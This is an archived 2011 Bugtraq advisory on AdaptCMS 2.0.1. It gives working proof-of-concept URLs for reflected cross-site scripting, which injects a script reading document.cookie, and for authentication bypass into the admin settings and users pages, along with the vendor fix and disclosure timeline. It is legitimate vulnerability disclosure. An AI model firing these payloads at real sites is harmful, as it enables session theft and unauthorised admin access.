[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
AdaptCMS 2.0.1 Multiple security vulnerabilities
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: AdaptCMS 2.0.1 Multiple security vulnerabilities
- From: sschurtz@xxxxxxxxxxx
- Date: Mon, 26 Sep 2011 06:18:20 GMT
Advisory: AdaptCMS 2.0.1 Multiple security vulnerabilities
Advisory ID: SSCHADV2011-018
Author: Stefan Schurtz
Affected Software: Successfully tested on AdaptCMS 2.0.1
Vendor URL: http://www.adaptcms.com/
Vendor Status: fixed
CVE-ID: -
==========================
Vulnerability Description:
==========================
AdaptCMS 2.0.1 is prone to multiple security vulnerabilities
==================
Technical Details:
==================
Cross-site Scripting
http://<target>/AdaptCMS/admin.php?view=</script><script>alert(document.cookie)</script>
http://<target>/AdaptCMS/admin.php?view=share&do=</script><script>alert(document.cookie)</script>
http://<target>/AdaptCMS//?'</script><script>alert(document.cookie)</script>
http://<target>/AdaptCMS//index.php?'</script><script>alert(document.cookie)</script>
Authentication bypass / Information Disclosure
http://<target>/AdaptCMS/admin.php?view=/&view=settings
http://<target>/AdaptCMS/admin.php?view=/&view=users
http://<target>/AdaptCMS/admin.php?view=/&view=groups
http://<target>/AdaptCMS/admin.php?view=/&view=levels
http://<target>/AdaptCMS/admin.php?view=/&view=stats
=========
Solution:
=========
"Get the latest AdaptCMS Files" from the admin area
====================
Disclosure Timeline:
====================
24-Sep-2011 - informed developers
24-Sep-2011 - Release date of this security advisory
25-Sep-2011 - fixed by vendor
25-Sep-2011 - post on BugTraq
========
Credits:
========
Vulnerabilities found and advisory written by Stefan Schurtz.
===========
References:
===========
http://www.adaptcms.com/
http://www.insanevisions.com/article/293/News/AdaptCMS-201-Security-Hole
http://www.rul3z.de/advisories/SSCHADV2011-018.txt